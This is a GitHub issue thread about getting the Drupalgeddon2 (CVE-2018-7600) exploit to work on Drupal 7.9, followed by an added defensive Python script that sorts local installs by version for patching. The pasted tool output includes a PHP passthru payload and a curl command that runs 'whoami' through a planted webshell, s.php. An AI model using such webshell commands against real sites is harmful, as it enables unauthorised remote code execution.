dreadlocked / Drupalgeddon2

Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)

Drupal v7.9 - "[+] Drupal!: can detect a matching directory" #23

Open kill-20 opened 6 years ago

kill-20 commented 6 years ago

Hi! Thank you for sharing this PoC! It works like a charm on my 7.28 and 7.56. However, on a 7.9 site I only get

[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[*] Target : http://xxxxx/
--------------------------------------------------------------------------------
[!] MISSING: http://xxxxx/CHANGELOG.txt (404)
[!] MISSING: http://xxxxx/core/CHANGELOG.txt (404)
[+] Found  : http://xxxxx/includes/bootstrap.inc (200)
[+] Drupal!: can detect a matching directory
--------------------------------------------------------------------------------
[*] Testing: Code Execution
[*] Payload: echo TZPPOZNH
[!] Unsupported Drupal version

Obviously, the exploit encounters some problems while determining the Drupal version. Earlier versions of the exploit respond with

*nothing interesting above, I think*
[+] Drupal!: can detect a matching directory
--------------------------------------------------------------------------------
[*] PHP cmd: passthru 
--------------------------------------------------------------------------------
[+] Target seems to be exploitable! w00hooOO!
[+] Result: *lots of html code of http://xxxxx/?q=user/password/*
--------------------------------------------------------------------------------
[*]   curl 'http://xxxxx/s.php' -d 'c=whoami'
--------------------------------------------------------------------------------
[!] Exploit FAILED ~ Response: 404

I would appreciate any help getting this exploit to work. Thanks in advance. Regards, kill-20

g0tmi1k commented 6 years ago

I will install it locally (I've not tried that version) and get back to you


Edit: Yup. I'm having the same issue too. I wonder if v7.9 is vulnerable to it.

g0tmi1k commented 6 years ago

So I've had a play about with a few v7.x:

v7.22 - not vulnerable
v7.23 - vulnerable
...
v7.57 - vulnerable
v7.58 - not vulnerable

The exploit may need tweaking for a larger range of versions!
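
For triaging your own Drupal 7 installs against the version boundaries reported in this thread, here is an added example (not part of the issue thread or the project's code). It reads the `VERSION` constant from a local `includes/bootstrap.inc`, the file the tool's output shows being found when `CHANGELOG.txt` returns 404, and sorts each tree using the 7.23 and 7.58 boundaries above. Function names, labels and the sample trees are constructed for illustration, and anything below 7.58 is flagged for update even where the PoC failed.

```python
import re
import tempfile
from pathlib import Path

FIXED = (7, 58)           # first 7.x release reported "not vulnerable" in the thread
POC_WORKS_FROM = (7, 23)  # lowest release the thread reports the PoC working on

# Drupal 7 core declares its version as define('VERSION', '7.x') in bootstrap.inc.
VERSION_RE = re.compile(
    r"define\(\s*['\"]VERSION['\"]\s*,\s*['\"](\d+)\.(\d+)(-[\w.]+)?['\"]\s*\)")

def read_core_version(docroot):
    """Return (major, minor, suffix) from includes/bootstrap.inc, or None."""
    path = Path(docroot) / "includes" / "bootstrap.inc"
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return None  # missing or unreadable file: do not guess
    m = VERSION_RE.search(text)
    return (int(m.group(1)), int(m.group(2)), m.group(3) or "") if m else None

def triage(version):
    """Map a parsed version to a patch-triage label (labels are hypothetical)."""
    if version is None:
        return "unknown"
    major, minor, suffix = version
    if major != 7:
        return "out-of-scope"
    if suffix:
        return "unknown"  # e.g. a -dev snapshot cannot be ordered against releases
    if (major, minor) >= FIXED:
        return "patched"
    if (major, minor) >= POC_WORKS_FROM:
        return "update-poc-range"
    # Below 7.23 the PoC failed in the thread, but the tree still predates 7.58.
    return "update-poc-failed"

def demo():
    """Build constructed sample trees in a temp dir and triage each one."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for ver in ("7.9", "7.22", "7.56", "7.58", "7.58-dev"):
            inc = Path(tmp) / ver / "includes"
            inc.mkdir(parents=True)
            (inc / "bootstrap.inc").write_text(
                "<?php\ndefine('VERSION', '%s');\n" % ver)
            results[ver] = triage(read_core_version(Path(tmp) / ver))
        results["missing"] = triage(read_core_version(Path(tmp) / "nope"))
    return results

if __name__ == "__main__":
    for name, label in demo().items():
        print(name, "->", label)
```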